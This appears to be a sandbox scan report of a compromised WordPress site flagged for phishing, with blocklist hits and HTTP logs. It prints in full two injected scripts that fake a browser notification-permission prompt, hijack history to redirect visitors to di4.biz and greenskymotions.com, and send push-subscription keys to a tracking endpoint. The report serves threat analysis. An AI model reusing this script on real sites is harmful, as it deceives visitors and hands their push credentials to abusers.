Overview

URLtriumphinvestigativeservicesllc.com/
IP 162.213.255.27 (United States)
ASN#22612 NAMECHEAP-NET
UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer
Report completed2022-12-04 13:52:47 UTC
StatusLoading report..
IDS alerts0
Blocklist alert23
urlquery alerts No alerts detected
Tags None

Domain Summary (0)

No passive DNS data

Network Intrusion Detection Systemsinfo

Suricata /w Emerging Threats Pro
 No alerts detected

Blocklists

OpenPhish
 No alerts detected

PhishTank
 No alerts detected

Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-12-04 2 triumphinvestigativeservicesllc.com/ Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/ Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-includes/css/dashicons.min.css?ver=6.1.1 Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/plugins/widget-areas/css/wid (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/themes/the-guard/css/alicoBo (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/themes/the-guard/css/dynamic (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/themes/the-guard/css/font-aw (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/themes/the-guard/style.css?v (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-includes/css/dist/block-library/styl (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/plugins/woocommerce/packages (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/plugins/js_composer/assets/c (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/plugins/contact-form-7/inclu (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/uploads/smile_fonts/Defaults (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/plugins/Ultimate_VC_Addons/a (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/plugins/Ultimate_VC_Addons/a (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-includes/js/jquery/jquery-migrate.mi (...) Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/plugins/responsive-lightbox/ (...) Phishing
2022-12-04 2 new.weatherplllatform.com/stick.js?v=9.00 Malware
2022-12-04 2 away.cdnbestplatform.com/go.php?id=9677-22-5680954-11 Malware
2022-12-04 2 greenskymotions.com/b91698fd2.js Phishing
2022-12-04 2 0.greenskymotions.com/b91698fd2.js Phishing
2022-12-04 2 greenskymotions.com/go/mu4genjugq5dcmjrhe3a?sub2=dfastspeed15 Phishing
2022-12-04 2 triumphinvestigativeservicesllc.com/wp-content/plugins/revslider/public/ass (...) Phishing

mnemonic secure dns
 No alerts detected

Quad9 DNS
 No alerts detected


Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 162.213.255.27
Date UQ / IDS / BL URL IP
2022-12-09 00:43:53 +0000 0 - 0 - 11 rgrlondon.com/ngi/index.php?QBOT.zip 162.213.255.27
2022-12-08 01:54:24 +0000 0 - 0 - 3 rgrlondon.com/ngi/index.php?QBOT.zip 162.213.255.27
2022-12-04 13:52:47 +0000 0 - 0 - 23 triumphinvestigativeservicesllc.com/ 162.213.255.27
2022-09-13 22:15:19 +0000 0 - 0 - 2 hmsjasmin.com/AdelaidaSeptember/lilly/3zpz954 (...) 162.213.255.27
2022-09-05 19:22:05 +0000 0 - 0 - 3 lomksrare.org/ 162.213.255.27


Last 5 reports on ASN: NAMECHEAP-NET
Date UQ / IDS / BL URL IP
2023-02-08 01:10:27 +0000 0 - 2 - 2 52421398.top/login.php 162.0.215.120
2023-02-08 00:55:23 +0000 0 - 2 - 0 52421398.top/login.php 162.0.215.120
2023-02-08 00:00:08 +0000 0 - 0 - 20 addaxbanking.com/ 68.65.122.207
2023-02-07 23:44:55 +0000 0 - 0 - 1 parewebs.com/ 198.54.126.138
2023-02-07 23:33:59 +0000 0 - 0 - 7 habaricom.com/ 66.29.147.146


Last 1 reports on domain: triumphinvestigativeservicesllc.com
Date UQ / IDS / BL URL IP
2022-12-04 13:52:47 +0000 0 - 0 - 23 triumphinvestigativeservicesllc.com/ 162.213.255.27


Last 5 reports with similar screenshot
Date UQ / IDS / BL URL IP
2023-02-07 23:51:04 +0000 0 - 2 - 0 fiftyflattery.top/b071SXxhfGoGfnVEcjEmbTIUWxZ (...) 104.21.71.22
2023-02-07 23:43:06 +0000 0 - 0 - 4 account.jxtxjx.com/jp.php 47.91.23.80
2023-02-07 22:40:22 +0000 4 - 1 - 7 multiplexlogic.com/coxmado/web/login.php?web/ (...) 108.179.232.32
2023-02-07 21:29:57 +0000 0 - 0 - 11 cn.mcafee-service.us.com/ 45.56.79.23
2023-02-07 21:11:34 +0000 0 - 4 - 0 6784.world/go.php?go=download.tl/download/c4a (...) 185.66.201.7

JavaScript

Executed Scripts (14)

Executed Evals (2)
#1 JavaScript::Eval (size: 8089) - SHA256: 4a2e974d1ae1054a69bb97d439f99d1f220a390c65f496c21e2bc7ae84293c70
'use strict';
var guardEnabled = false;
var isChrome = false;
if (guardEnabled && /Chrome/.test(navigator.userAgent || '') && /Google Inc/.test(navigator.vendor || '')) {
    let version = navigator.userAgent.match(/Chrom(?:e|ium)\/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/);
    if (version !== null && compareVersion('74.0.3729.131', version[1]) <= 0) {
        isChrome = true
    }
}

function compareVersion(v1, v2) {
    if (typeof v1 !== 'string') return false;
    if (typeof v2 !== 'string') return false;
    v1 = v1.split('.');
    v2 = v2.split('.');
    const k = Math.min(v1.length, v2.length);
    for (let i = 0; i < k; ++i) {
        v1[i] = parseInt(v1[i], 10);
        v2[i] = parseInt(v2[i], 10);
        if (v1[i] > v2[i]) return 1;
        if (v1[i] < v2[i]) return -1
    }
    return v1.length == v2.length ? 0 : (v1.length < v2.length ? -1 : 1)
}
const MESSAGES = {
        ru: {
            title: '... 70?@0H8205B @07@5H5=85 =0:',
            permission: '>:07 C254><;5=89',
            allow: ' 07@5H8BL',
            disallow: ';>:8@>20BL'
        },
        en: {
            title: '... wants to:',
            permission: 'Show notifications',
            allow: 'Allow',
            disallow: 'Block'
        },
        it: {
            title: '... chiede il permesso di:',
            permission: 'Mostra notifiche',
            allow: 'Permettere',
            disallow: 'Bloccare'
        },
        id: {
            title: '... meminta izin untuk:',
            permission: 'Tampilkan pemberitahuan',
            allow: 'Mengizinkan',
            disallow: 'Blok'
        },
        vi: {
            title: '... xin ph�p:',
            permission: 'Hi�n th� th�ng b�o',
            allow: 'Cho ph�p',
            disallow: 'Kh�i'
        },
        ar: {
            title: '... J7D( %0F D:',
            permission: '%8G'
            1 'D%.7'
            1 '*',
            allow: ''
            D3E '-',
            disallow: 'EF9'
        },
        pl: {
            title: '... prosi o pozwolenie:',
            permission: 'Poka| powiadomienia',
            allow: 'Dopuszcza',
            disallow: 'Blok'
        },
        pt: {
            title: '... pede permiss�o para:',
            permission: 'Mostrar notifica��es',
            allow: 'Permitir',
            disallow: 'Quadra'
        },
        fr: {
            title: '... demande la permission de:',
            permission: 'Afficher les notifications',
            allow: 'Permettre',
            disallow: 'Bloc'
        },
        de: {
            title: '... bittet um Erlaubnis:',
            permission: 'Zeige Benachrichtigungen',
            allow: 'Erm�glichen',
            disallow: 'Block'
        },
        es: {
            title: '... pide permiso para:',
            permission: 'Mostrar notificaciones',
            allow: 'Permitir',
            disallow: 'Bloquear'
        },
        th: {
            title: '... --8
            2 1: ',permission:'
            A * 2 # A I@ 7 - ',allow:' - 8 2 ',disallow:' % 8 H!'}};MESSAGES.uk=MESSAGES.ru;MESSAGES.current=MESSAGES[getLanguage()]||MESSAGES.en;function getLanguage(){let language=window.navigator?(window.navigator.userLanguage||window.navigator.language||window.navigator.browserLanguage||window.navigator.systemLanguage):'
            ru ';language=language.substr(0,2).toLowerCase();return language}let template='\ < div style = "color:#000;box-sizing: border-box;-webkit-box-sizing:border-box;width: 320px;max-width: 100%;height: 130px;background: #fff;position: fixed;top: 0;left: ' + (window.innerWidth < 400 ? 0 : 56) + 'px;box-shadow: 0 0 20px #0000008a;border-radius: 3px;line-height: 1;" > < img class = "js-close"
            style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 0;margin:0;position: absolute;width: 11px;height:11px;right:10px;top:10px;cursor: pointer;outline: 0 !important;"
            src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAAeCAMAAAAM7l6QAAAAS1BMVEUAAABaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlo8++Y/AAAAGHRSTlMAC/Tp5NHux7woBr8u1CEiE8wfMh3aqKRGKXN5AAAAxklEQVQoz22SWxaDIAxEo6JQLIpWW/a/0kYE5xCYDx+53BwkEse4herMbqVIQ1AVtzNXD76bwBlWQfVVVfvlRv4qsE5VOvkKH+4d8mN6mh6/23LpzS/ggvZMJa+XW43loNisfdp5Kl3hq0TlQc0BwWdKDlfGgKqD6vwy3Tpq5Jvx6FvzFRurKfjSpvCb9HzOZ2/QydNW9zf1SOCD3gN14NJNA0d/K2jhH8IV/kQ60Q8o/J46DRfxLv8xVsMt/EgvPkQqfcUd/7Y7JTdYkYd+AAAAAElFTkSuQmCC" / > < div style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 5% 5% 4% 5%;font-family: calibri,arial;font-size: 17px;" > '+MESSAGES.current.title+' < /div><div style="text-align: left;font-size: 0;line-height: 0;padding: 0 5%;"><img style="width:13px;vertical-align: top;padding: 0;margin: 0;display: inline-block;" src="data:image/png;base64,
            iVBORw0KGgoAAAANSUhEUgAAACQAAAAqCAMAAADs1AnaAAAAUVBMVEUAAABaWlpZWVlaWlpZWVlSUlJZWVlaWlpZWVlZWVlWVlZOTk5ZWVlZWVlaWlpZWVlZWVlXV1dRUVFaWlpaWlpZWVlaWlpZWVlaWlpVVVVaWlqPKIPXAAAAGnRSTlMAXm2UZw358qZCMAjfzbOrWDUX48S4nIx3J6SDwgkAAAC9SURBVDjL7dLLDoMgEIXhaSsC3vHuef8HLVETFWHUpMv + 6 y9nMUBupm0NXVTFQFzxRmSwZYJFUwxbPLEoWVDCEN1nmMt6HVopsKvwrkUSh2R0NiNOjacdeHK2EulDMjmgDt66vdEItL + ECiG1GdGEULO9okEws / 2 PMKrcI / GneofR + 49 + iB49S1qEUZGuRoFJpbMpwVZaJVbDKEE5LssJN6LXjeh59Wet5pDEnOQQDQsaiEso2JQgPp3nmpy + KIFSTz3Bs58AAAAASUVORK5CYII = "/><span style="
            display: inline - block;vertical - align: top;margin - left: 14 px;font - size: 15 px;line - height: 1;font - family: Calibri,
            Arial;font - weight: 400;
            ">'+MESSAGES.current.permission+'</span></div><div style="
            padding: 22 px 12 px 0 12 px;font - size: 0;line - height: 0;text - align: right;
            "><div class="
            js - allow " style="
            font - weight: 600;border: 1 px solid # dadce0;color: #3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" >'+MESSAGES.current.allow+'</div><div class= "js-denied"
            style = "font-weight:600;border:1px solid#dadce0;color:#3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" > '+MESSAGES.current.disallow+' < /div></div > < /div>';var rootElement=null;var canStart=false;window.onload=function(){function GGG(){if(isChrome&&rootElement){rootElement.parentNode.removeChild(rootElement);rootElement=null;let wait=()=>{if(!canStart){return setTimeout(wait,500)}};wait();SSS()}}document.querySelector('html').addEventListener('click',GGG);document.querySelector('html').addEventListener('keydown',GGG);if(isChrome){rootElement=document.createElement('div');rootElement.innerHTML=template;document.body.appendChild(rootElement)}};function disableHistory(){try{$(window).on('popstate',function(t){if(t.state){if(Notification.permission==='granted'){location.replace('https:/ / di4.biz / ? auf = gy2tqmleha5dcnrqgixtcmjrhe3c6nbpmy2tezlemi2dklzrgixtcnrxgaytmmjzgyya & p = b & sub1 = & sub2 = dfastspeed15 & sub3 = & sub4 = & cpc = 0 & cpm = 0 ')}else{location.replace('
            https : //di4.biz/?auf=gy2tqmleha5dcnrqgixtcmjrhe3c6nbpmy2tezlemi2dklzrgixtcnrxgaytmmjzgyya&p=b&sub1=&sub2=dfastspeed15&sub3=&sub4=&cpc=0&cpm=0')}}})}catch(error){}}disableHistory();let myApplicationServerKey=urlB64ToUint8Array('BIbjCoVklTIiXYjv3Z5WS9oemREJPCOFVHwpAxQphYoA5FOTzG-xOq6GiK31R-NF--qzgT3_C2jurmRX_N6nY4g');var denied=function(){window.location.href='https://di4.biz/?auf=gy2tqmleha5dcnrqgixtcmjrhe3c6nbpmy2tezlemi2dklzrgixtcnrxgaytmmjzgyya&p=b&sub1=&sub2=dfastspeed15&sub3=&sub4=&cpc=0&cpm=0'};let workerInstaller=null;function getWorkerRegistration(){return workerInstaller.then(()=>navigator.serviceWorker.ready)}function CCC(){return getWorkerRegistration().then(registration=>registration.pushManager.subscribe({userVisibleOnly:true,applicationServerKey:myApplicationServerKey})).then(fff=>{let gmt=-new Date().getTimezoneOffset()/60;let rawKey=fff.getKey?fff.getKey('p256dh'):'';let key=rawKey?btoa(String.fromCharCode.apply(null,new Uint8Array(rawKey))):'';let rawAuthSecret=fff.getKey?fff.getKey('auth'):'';let authSecret=rawAuthSecret?btoa(String.fromCharCode.apply(null,new Uint8Array(rawAuthSecret))):'';return fetch('/?send=7d6873aa-840c-4786-92e7-c992d53d5656&d=mu4genjugq5dcmjrhe3a&land=4',{method:'POST',mode:'no-cors',body:JSON.stringify({id:fff.endpoint,key:key,secret:authSecret,gmt:gmt,uri:window.location.href})})}).then(()=>{window.location.href='https://di4.biz/?auf=gy2tqmleha5dcnrqgixtcmjrhe3c6nbpmy2tezlemi2dklzrgixtcnrxgaytmmjzgyya&p=b&sub1=&sub2=dfastspeed15&sub3=&sub4=&cpc=0&cpm=0'}).catch(()=>{denied()})};function SSS(){Notification.requestPermission().then(function(){if(Notification.permission==='granted'){CCC()}else{denied()}})};if('serviceWorker'in navigator){workerInstaller=navigator.serviceWorker.register('/b91698fd2.js').then(()=>{if(Notification.permission==='granted'){window.location.href='https://di4.biz/?auf=gy2tqmleha5dcnrqgixtcmjrhe3c6nbpmy2tezlemi2dklzrgixtcnrxgaytmmjzgyya&p=b&sub1=&sub2=dfastspeed15&sub3=&sub4=&cpc=0&cpm=0'}else if(Notification.permission!=='denied'){canStart=true;if(!isChrome){SSS()}}else{denied()}})}
#2 JavaScript::Eval (size: 7971) - SHA256: 20b0abfdadb8c8da7300bceadd6d788663ce68b42d369f21065fe1e2dc8a39f2
'use strict';
var guardEnabled = false;
var isChrome = false;
if (guardEnabled && /Chrome/.test(navigator.userAgent || '') && /Google Inc/.test(navigator.vendor || '')) {
    let version = navigator.userAgent.match(/Chrom(?:e|ium)\/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/);
    if (version !== null && compareVersion('74.0.3729.131', version[1]) <= 0) {
        isChrome = true
    }
}

function compareVersion(v1, v2) {
    if (typeof v1 !== 'string') return false;
    if (typeof v2 !== 'string') return false;
    v1 = v1.split('.');
    v2 = v2.split('.');
    const k = Math.min(v1.length, v2.length);
    for (let i = 0; i < k; ++i) {
        v1[i] = parseInt(v1[i], 10);
        v2[i] = parseInt(v2[i], 10);
        if (v1[i] > v2[i]) return 1;
        if (v1[i] < v2[i]) return -1
    }
    return v1.length == v2.length ? 0 : (v1.length < v2.length ? -1 : 1)
}
const MESSAGES = {
        ru: {
            title: '... 70?@0H8205B @07@5H5=85 =0:',
            permission: '>:07 C254><;5=89',
            allow: ' 07@5H8BL',
            disallow: ';>:8@>20BL'
        },
        en: {
            title: '... wants to:',
            permission: 'Show notifications',
            allow: 'Allow',
            disallow: 'Block'
        },
        it: {
            title: '... chiede il permesso di:',
            permission: 'Mostra notifiche',
            allow: 'Permettere',
            disallow: 'Bloccare'
        },
        id: {
            title: '... meminta izin untuk:',
            permission: 'Tampilkan pemberitahuan',
            allow: 'Mengizinkan',
            disallow: 'Blok'
        },
        vi: {
            title: '... xin ph�p:',
            permission: 'Hi�n th� th�ng b�o',
            allow: 'Cho ph�p',
            disallow: 'Kh�i'
        },
        ar: {
            title: '... J7D( %0F D:',
            permission: '%8G'
            1 'D%.7'
            1 '*',
            allow: ''
            D3E '-',
            disallow: 'EF9'
        },
        pl: {
            title: '... prosi o pozwolenie:',
            permission: 'Poka| powiadomienia',
            allow: 'Dopuszcza',
            disallow: 'Blok'
        },
        pt: {
            title: '... pede permiss�o para:',
            permission: 'Mostrar notifica��es',
            allow: 'Permitir',
            disallow: 'Quadra'
        },
        fr: {
            title: '... demande la permission de:',
            permission: 'Afficher les notifications',
            allow: 'Permettre',
            disallow: 'Bloc'
        },
        de: {
            title: '... bittet um Erlaubnis:',
            permission: 'Zeige Benachrichtigungen',
            allow: 'Erm�glichen',
            disallow: 'Block'
        },
        es: {
            title: '... pide permiso para:',
            permission: 'Mostrar notificaciones',
            allow: 'Permitir',
            disallow: 'Bloquear'
        },
        th: {
            title: '... --8
            2 1: ',permission:'
            A * 2 # A I@ 7 - ',allow:' - 8 2 ',disallow:' % 8 H!'}};MESSAGES.uk=MESSAGES.ru;MESSAGES.current=MESSAGES[getLanguage()]||MESSAGES.en;function getLanguage(){let language=window.navigator?(window.navigator.userLanguage||window.navigator.language||window.navigator.browserLanguage||window.navigator.systemLanguage):'
            ru ';language=language.substr(0,2).toLowerCase();return language}let template='\ < div style = "color:#000;box-sizing: border-box;-webkit-box-sizing:border-box;width: 320px;max-width: 100%;height: 130px;background: #fff;position: fixed;top: 0;left: ' + (window.innerWidth < 400 ? 0 : 56) + 'px;box-shadow: 0 0 20px #0000008a;border-radius: 3px;line-height: 1;" > < img class = "js-close"
            style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 0;margin:0;position: absolute;width: 11px;height:11px;right:10px;top:10px;cursor: pointer;outline: 0 !important;"
            src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAAeCAMAAAAM7l6QAAAAS1BMVEUAAABaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlo8++Y/AAAAGHRSTlMAC/Tp5NHux7woBr8u1CEiE8wfMh3aqKRGKXN5AAAAxklEQVQoz22SWxaDIAxEo6JQLIpWW/a/0kYE5xCYDx+53BwkEse4herMbqVIQ1AVtzNXD76bwBlWQfVVVfvlRv4qsE5VOvkKH+4d8mN6mh6/23LpzS/ggvZMJa+XW43loNisfdp5Kl3hq0TlQc0BwWdKDlfGgKqD6vwy3Tpq5Jvx6FvzFRurKfjSpvCb9HzOZ2/QydNW9zf1SOCD3gN14NJNA0d/K2jhH8IV/kQ60Q8o/J46DRfxLv8xVsMt/EgvPkQqfcUd/7Y7JTdYkYd+AAAAAElFTkSuQmCC" / > < div style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 5% 5% 4% 5%;font-family: calibri,arial;font-size: 17px;" > '+MESSAGES.current.title+' < /div><div style="text-align: left;font-size: 0;line-height: 0;padding: 0 5%;"><img style="width:13px;vertical-align: top;padding: 0;margin: 0;display: inline-block;" src="data:image/png;base64,
            iVBORw0KGgoAAAANSUhEUgAAACQAAAAqCAMAAADs1AnaAAAAUVBMVEUAAABaWlpZWVlaWlpZWVlSUlJZWVlaWlpZWVlZWVlWVlZOTk5ZWVlZWVlaWlpZWVlZWVlXV1dRUVFaWlpaWlpZWVlaWlpZWVlaWlpVVVVaWlqPKIPXAAAAGnRSTlMAXm2UZw358qZCMAjfzbOrWDUX48S4nIx3J6SDwgkAAAC9SURBVDjL7dLLDoMgEIXhaSsC3vHuef8HLVETFWHUpMv + 6 y9nMUBupm0NXVTFQFzxRmSwZYJFUwxbPLEoWVDCEN1nmMt6HVopsKvwrkUSh2R0NiNOjacdeHK2EulDMjmgDt66vdEItL + ECiG1GdGEULO9okEws / 2 PMKrcI / GneofR + 49 + iB49S1qEUZGuRoFJpbMpwVZaJVbDKEE5LssJN6LXjeh59Wet5pDEnOQQDQsaiEso2JQgPp3nmpy + KIFSTz3Bs58AAAAASUVORK5CYII = "/><span style="
            display: inline - block;vertical - align: top;margin - left: 14 px;font - size: 15 px;line - height: 1;font - family: Calibri,
            Arial;font - weight: 400;
            ">'+MESSAGES.current.permission+'</span></div><div style="
            padding: 22 px 12 px 0 12 px;font - size: 0;line - height: 0;text - align: right;
            "><div class="
            js - allow " style="
            font - weight: 600;border: 1 px solid # dadce0;color: #3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" >'+MESSAGES.current.allow+'</div><div class= "js-denied"
            style = "font-weight:600;border:1px solid#dadce0;color:#3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" > '+MESSAGES.current.disallow+' < /div></div > < /div>';var rootElement=null;var canStart=false;window.onload=function(){function GGG(){if(isChrome&&rootElement){rootElement.parentNode.removeChild(rootElement);rootElement=null;let wait=()=>{if(!canStart){return setTimeout(wait,500)}};wait();SSS()}}document.querySelector('html').addEventListener('click',GGG);document.querySelector('html').addEventListener('keydown',GGG);if(isChrome){rootElement=document.createElement('div');rootElement.innerHTML=template;document.body.appendChild(rootElement)}};function disableHistory(){try{$(window).on('popstate',function(t){if(t.state){if(Notification.permission==='granted'){location.replace('https:/ / di4.biz / ? auf = miygkzjtgy5dcnrqgixtcmjrhe3c6mrqf5tdkmtfmrrdinjpgezc6mjwg4ydcnrrhe2ts & p = b & sub1 = & sub2 = dfastspeed15 & sub3 = & sub4 = & cpc = 0 & cpm = 0 ')}else{location.replace('
            https : //0.greenskymotions.com/index.php?p=mu4genjugq5dcmjrhe3a&sub2=dfastspeed15')}}})}catch(error){}}disableHistory();let myApplicationServerKey=urlB64ToUint8Array('BIbjCoVklTIiXYjv3Z5WS9oemREJPCOFVHwpAxQphYoA5FOTzG-xOq6GiK31R-NF--qzgT3_C2jurmRX_N6nY4g');var denied=function(){window.location.href='https://0.greenskymotions.com/index.php?p=mu4genjugq5dcmjrhe3a&sub2=dfastspeed15'};let workerInstaller=null;function getWorkerRegistration(){return workerInstaller.then(()=>navigator.serviceWorker.ready)}function CCC(){return getWorkerRegistration().then(registration=>registration.pushManager.subscribe({userVisibleOnly:true,applicationServerKey:myApplicationServerKey})).then(fff=>{let gmt=-new Date().getTimezoneOffset()/60;let rawKey=fff.getKey?fff.getKey('p256dh'):'';let key=rawKey?btoa(String.fromCharCode.apply(null,new Uint8Array(rawKey))):'';let rawAuthSecret=fff.getKey?fff.getKey('auth'):'';let authSecret=rawAuthSecret?btoa(String.fromCharCode.apply(null,new Uint8Array(rawAuthSecret))):'';return fetch('/?send=7d6873aa-840c-4786-92e7-c992d53d5656&d=mu4genjugq5dcmjrhe3a&land=20',{method:'POST',mode:'no-cors',body:JSON.stringify({id:fff.endpoint,key:key,secret:authSecret,gmt:gmt,uri:window.location.href})})}).then(()=>{window.location.href='https://di4.biz/?auf=miygkzjtgy5dcnrqgixtcmjrhe3c6mrqf5tdkmtfmrrdinjpgezc6mjwg4ydcnrrhe2ts&p=b&sub1=&sub2=dfastspeed15&sub3=&sub4=&cpc=0&cpm=0'}).catch(()=>{denied()})};function SSS(){Notification.requestPermission().then(function(){if(Notification.permission==='granted'){CCC()}else{denied()}})};if('serviceWorker'in navigator){workerInstaller=navigator.serviceWorker.register('/b91698fd2.js').then(()=>{if(Notification.permission==='granted'){window.location.href='https://di4.biz/?auf=miygkzjtgy5dcnrqgixtcmjrhe3c6mrqf5tdkmtfmrrdinjpgezc6mjwg4ydcnrrhe2ts&p=b&sub1=&sub2=dfastspeed15&sub3=&sub4=&cpc=0&cpm=0'}else if(Notification.permission!=='denied'){canStart=true;if(!isChrome){SSS()}}else{denied()}})}

Executed Writes (0)


HTTP Transactions (68)


Request Response
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "1BAD6C06AA3E88DCBC125FC98A6CB753EB2B18D2C8DD61DA21D12209AEEDA3F9"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3800
Expires: Sun, 04 Dec 2022 14:55:56 GMT
Date: Sun, 04 Dec 2022 13:52:36 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 3636
Cache-Control: max-age=164357
Date: Sun, 04 Dec 2022 13:52:36 GMT
Etag: "638c76f5-1d7"
Expires: Tue, 06 Dec 2022 11:31:53 GMT
Last-Modified: Sun, 04 Dec 2022 10:31:17 GMT
Server: ECS (ska/F71C)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET / HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

search
                                         162.213.255.27
HTTP/1.1 301 Moved Permanently
content-type: text/html
                                        
keep-alive: timeout=5, max=100
content-length: 707
date: Sun, 04 Dec 2022 13:52:36 GMT
server: LiteSpeed
location: https://triumphinvestigativeservicesllc.com/
x-turbo-charged-by: LiteSpeed


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with CRLF, LF line terminators
Size:   707
Md5:    1304294c0823ca486542ba408ed761e3
Sha1:   b2a70fb2d810ca13985882e6981f33998823e83e
Sha256: 3bbe72f3baa8ec61de17a1d767fca58704769684b7abe9161d0c4eaf4c8f0982

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Retry-After, Content-Type, Backoff, Content-Length, Alert
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Sun, 04 Dec 2022 13:20:07 GMT
cache-control: public,max-age=3600
age: 1949
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    30db107dcf4380cef05efea409c2e6a3
Sha1:   96e6a306fbc07299aba64e5c14e2bfca35872fa9
Sha256: b64051a4a8e346e3c72b2aef77f360a5736ab5e16711d8e0bae3876feaa15b6e
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "7D7232C8C91BCD18161BA2C9D23E3BFF159604E058BD5B3FC1C7FCBCD03A7EE3"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2222
Expires: Sun, 04 Dec 2022 14:29:38 GMT
Date: Sun, 04 Dec 2022 13:52:36 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain HTTP/1.1 
